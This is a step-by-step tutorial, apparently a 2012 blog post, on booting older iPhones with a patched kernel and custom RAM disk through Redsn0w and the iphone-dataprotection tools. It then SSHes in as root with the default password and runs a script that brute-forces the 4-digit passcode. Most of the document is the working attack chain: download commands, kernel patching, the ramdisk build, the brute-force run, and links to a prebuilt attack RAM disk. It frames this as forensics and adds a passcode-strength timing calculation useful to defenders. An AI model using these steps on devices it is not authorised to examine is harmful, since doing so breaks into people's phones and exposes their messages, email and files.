Hacking the iPhone and breaking PINs and Passcodes

iOS devices can be booted with their own kernel and micro operating system instead of the approved Apple firmware. When an iOS device is loaded with such a micro kernel you can run attacks such as bypassing the passcode, decrypting passwords, copying the file system, examining emails and text messages, and much more.

A special shout out to Tom Bedwell, a great technical strategist for allowing me to bounce my ideas and do some sanity checking. Follow Tom on Twitter: twitter.com/tb_well

Note:

If you run into trouble when creating a RAM DISK due to unique OS configurations and code versions, don't despair.

The following guide describes in detail how to create a RAM DISK; however, it may not work precisely as a step-by-step instruction set, since each system is unique and requires some level of customization.

If you want to take the easy way

Download: http://cloudcentrics.com/wp-content/uploads/2012/11/iphone-dataprotection-modifed.zip and then complete step 11 and proceed to step 20.

Now let the real fun begin

IMPORTANT: Watch the word wrap. Many commands are single-line commands that may be wrapped onto multiple lines here.

Step 1: Uninstall file system readers

If you have a file-system tool such as MacFuse or Tuxera installed, uninstall it before you get started and reboot your machine.

Step 2: Install Xcode from the Mac App Store

Step 3: Download and install Xcode Command Line Tools:

1. Download Xcode from the Apple App Store
2. Launch Xcode and go to Preferences
3. Install the Xcode Command Line Tools and Simulators

Step 4: Open the Terminal app.

Make sure you are in your home directory. In my case the home directory is /Users/alakhani.

Step 5: Install ldid and required dependencies.

ldid is used to self-sign the pieces of code that we will upload to the iPhone.

1. curl -O http://networkpx.googlecode.com/files/ldid
2. chmod +x ldid
3. sudo mv ldid /usr/bin/

Step 6: Install Fuse

Fuse is an extension that allows Mac OS X to read non-native file systems.

1. First verify what the latest version of Fuse is by going to http://osxfuse.github.com. At the time of writing the latest version is 2.5.4. You do not need to download it from there; we will download it from the command line.
2. curl -O -L https://github.com/downloads/osxfuse/osxfuse/OSXFUSE-2.5.4.dmg
3. hdiutil mount OSXFUSE-2.5.4.dmg
4. sudo installer -pkg "/Volumes/FUSE for OS X/Install OSXFUSE 2.5.pkg" -target /
5. Once the installer reports success, eject the image: sudo hdiutil eject "/Volumes/FUSE for OS X/"

Step 6: Download and install Python packages

OS X 10.8.x comes preloaded with Python. However, we will still need to add some Python packages.

1. sudo ARCHFLAGS='-arch i386 -arch x86_64' easy_install pycrypto
2. sudo easy_install M2crypto construct progressbar

Step 7: Download and install Mercurial

1. Go to http://mercurial.selenic.com/
2. Download and install Mercurial 2.4 or later

Step 8: Download the iPhone Data Protection utilities

1. hg clone https://code.google.com/p/iphone-dataprotection/ (note: if the command does not work, you did not install Mercurial)
2. cd iphone-dataprotection

Step 9: Create the script to encrypt and decrypt the ramdisk and kernel

Compile img3fs.c. This program is used to encrypt and decrypt the ramdisk and the kernel patch.

I ran into some issues and had to change the compiler path. You can change this by editing the makefile in the img3fs folder.

1. make -C img3fs/

Step 10: Download Redsn0w

Verify the latest version of Redsn0w. At the time of writing 0.9.15b3 is the latest version. You can check the latest version at http://www.iphonehacks.com/download-redsn0w. There is no reason to download it there; we will retrieve it directly into our working directory from the command line.

1. curl -O -L https://sites.google.com/a/iphonedev.com/files/home/redsn0w_mac_0.9.15b3.zip
2. unzip redsn0w_mac_0.9.15b3.zip
3. You will now copy the encryption keys

Step 11: Download iOS firmware

You will need a copy of iOS firmware for your device that is jailbreakable. You can go to http://www.getios.com to grab a copy of iOS firmware for your device.

NOTE: Because this requires a device and iOS firmware that are jailbreakable, it does not work on the iPhone 5 at the time of writing.

Step 12: Copy the iOS firmware from your Downloads folder (or wherever you saved it) to your iphone-dataprotection folder

Step 13: Create the patched kernel and shell script

python python_scripts/kernel_patcher.py iPhone3,3_5.1.1_9B206_Restore.ipsw

Step 15: Create RAM DISK

sh ./make_ramdisk_n92ap.sh

Step 16: iOS SDK Not Found

The paths to the iOS SDKs have changed.

1. Find where your iOS SDK is by typing the following command: xcode-select -print-path
2. Edit the make_ramdisk_n92ap.sh file

Change the following:

(Old)

"/Developer/Platforms/iPhoneOS.platform/Developer/SDKs/iPhoneOS$VER.sdk/System/Library/Frameworks/IOKit.framework/IOKit" ];

(New) Change it to the relevant path of your SDK:

"/Applications/Xcode.app/Contents/Developer/Platforms/iPhoneOS.platform/Developer/SDKs/iPhoneOS6.0.sdk/System/Library/Frameworks/IOKit.framework/IOKit" ];

(Old)

./build_ramdisk.sh iPhone3,3_5.1.1_9B206_Restore.ipsw 038-4361-021.dmg 28db49d00990ced317a7bcd24755b3426bb246cb135111126d8b3f7bb8ba9252 c248e221c08ece5862fea42a58dad552 myramdisk_n92ap.dmg

(New) Change it to the relevant ipsw you downloaded:

./build_ramdisk.sh iPhone3,3_5.1.1_9B206_Restore.ipsw 038-4361-021.dmg 28db49d00990ced317a7bcd24755b3426bb246cb135111126d8b3f7bb8ba9252 c248e221c08ece5862fea42a58dad552 myramdisk_n92ap.dmg

Step 17: Change Symbolic Link

Create a symbolic link so that the script's old /Developer path resolves to the Developer directory inside the Xcode bundle: sudo ln -s /Applications/Xcode.app/Contents/Developer /

Step 18: Run the script again

Run the make command again: sudo sh ./make_ramdisk_n92ap.sh

(Important: make sure you run it with sudo)

Note: If you skipped the earlier steps, or could not get step 18 to build a RAM disk, you can download a pre-created version of the RAM DISK here: http://cloudcentrics.com/wp-content/uploads/2012/11/iphone-dataprotection-modifed.zip

After you download the pre-created RAM disk you can move to step 20. You will also need to download a copy of jailbreakable iOS firmware as described in step 11.

Step 20: Load RAM Disk

Make sure the device is plugged in and turned off. The device needs to be plugged in BEFORE it is turned off.

Run the following command:

sudo ./redsn0w_mac_0.9.15b3/redsn0w.app/Contents/MacOS/redsn0w -i iPhone3,3_5.1.1_9B206_Restore.ipsw -r myramdisk_n90ap.dmg -k kernelcache.release.n90.patched

(note: change the iPhone firmware name to the one appropriate for your device, and make the ramdisk and kernelcache names match what your build produced; the command above uses n90ap, while step 15 built myramdisk_n92ap.dmg)

You will also need to change the redsn0w version and path to match yours.

Step 21: Follow the On-Screen Instructions

Wait a minute until you see the OK on the screen.

Step 22: USB MUX

Next we need to establish a connection from our computer to our phone. We will tunnel an SSH connection to the phone through the USB cable.

Essentially, this is the same way iTunes communicates with the iPhone over USB. The process is called USB multiplexing. It establishes a TCP connection over USB using SSL.

Open a new Terminal tab on the Mac and run the following command:

python usbmuxd-python-client/tcprelay.py -t 22:2222 1999:1999

Step 23: SSH into the phone

Open a new Terminal tab and SSH into the phone with the following command:

ssh -p 2222 root@localhost

password: alpine

Step 24: Run the brute-force script

Open a new Terminal tab on your Mac and type the following command:

python python_scripts/demo_bruteforce.py

(when you are prompted to provide the device's passcode, leave it blank)

This runs the brute-force passcode cracker. It is pre-configured to brute-force any 4-digit simple passcode and takes approximately 25 minutes to run through all possible combinations. You can modify the script to crack more complex passcodes and PINs.

In our case the passcode was "0111".

By default the script brute-forces 4-digit passcodes. It starts with "0000", then moves on to "0001", "0002", "0003" and so on. It takes approximately 25 minutes to cycle through all 10,000 combinations and reach 9999.
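The 25-minute figure above gives the defender the number that matters: about 6.7 attempts per second, or 0.15 s per passcode. The following is an added example, not part of the iphone-dataprotection scripts; it uses that observed rate to show how worst-case and expected cracking time grow with passcode length and alphabet. It assumes the per-attempt cost measured for 4-digit codes stays the same for longer codes, which is an assumption rather than something the guide measured.

```python
# Brute-force time scaling at the attempt rate observed in this guide.
# Added example, not part of the iphone-dataprotection toolkit. Assumption:
# the ~0.15 s per attempt measured for 4-digit codes holds for other policies.

OBSERVED_ATTEMPTS = 10_000      # all 4-digit passcodes, from the text above
OBSERVED_SECONDS = 25 * 60      # "approximately 25 minutes", from the text above


def attempts_per_second(attempts=OBSERVED_ATTEMPTS, seconds=OBSERVED_SECONDS):
    """Attempt rate implied by the observed run (about 6.7 per second)."""
    return attempts / seconds


def keyspace(length, alphabet_size):
    """Number of distinct passcodes of the given length over the alphabet."""
    return alphabet_size ** length


def worst_case_seconds(length, alphabet_size, rate=None):
    """Time to exhaust the whole keyspace."""
    rate = attempts_per_second() if rate is None else rate
    return keyspace(length, alphabet_size) / rate


def expected_seconds(length, alphabet_size, rate=None):
    """Average time to hit a uniformly random passcode: (N + 1) / 2 attempts."""
    rate = attempts_per_second() if rate is None else rate
    return (keyspace(length, alphabet_size) + 1) / 2 / rate


def humanize(seconds):
    """Render a duration in the largest unit that fits."""
    for name, size in (("years", 365 * 86400), ("days", 86400),
                       ("hours", 3600), ("minutes", 60)):
        if seconds >= size:
            return f"{seconds / size:.1f} {name}"
    return f"{seconds:.1f} seconds"


# Passcode policies worth comparing; the first is what the script targets.
POLICIES = (
    ("4-digit simple passcode", 4, 10),
    ("6-digit passcode", 6, 10),
    ("8-digit passcode", 8, 10),
    ("8-character alphanumeric", 8, 62),
)


def compare_policies(rate=None):
    """Return {policy name: (keyspace, worst-case time, expected time)}."""
    return {
        name: (keyspace(n, a),
               humanize(worst_case_seconds(n, a, rate)),
               humanize(expected_seconds(n, a, rate)))
        for name, n, a in POLICIES
    }


if __name__ == "__main__":
    print(f"observed rate: {attempts_per_second():.2f} attempts/s")
    for name, (space, worst, expected) in compare_policies().items():
        print(f"{name:26} {space:>16,d} codes  worst {worst:>16}  expected {expected}")
```

The expected time is half the worst case for a uniformly chosen passcode, so the defender's lever is the keyspace, not the order of guessing: at this rate a 6-digit passcode already pushes exhaustive search past a day and a half, and an alphanumeric passcode puts it out of reach entirely.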

Step 25: Reboot

Go to the SSH tab for your phone and issue the command: reboot

References:

I wanted to thank Satish at http://resources.infosecinstitute.com/iphone-forensics/ for his post and the work he did on the same topic. In the above article you will find my modifications, since I was running OS X 10.8.2 and a newer version of Xcode.

However, I encourage everyone to check out http://resources.infosecinstitute.com/iphone-forensics/, read the instructions and watch Satish's YouTube video at http://www.youtube.com/watch?feature=player_embedded&v=hp-Mrw4yo9o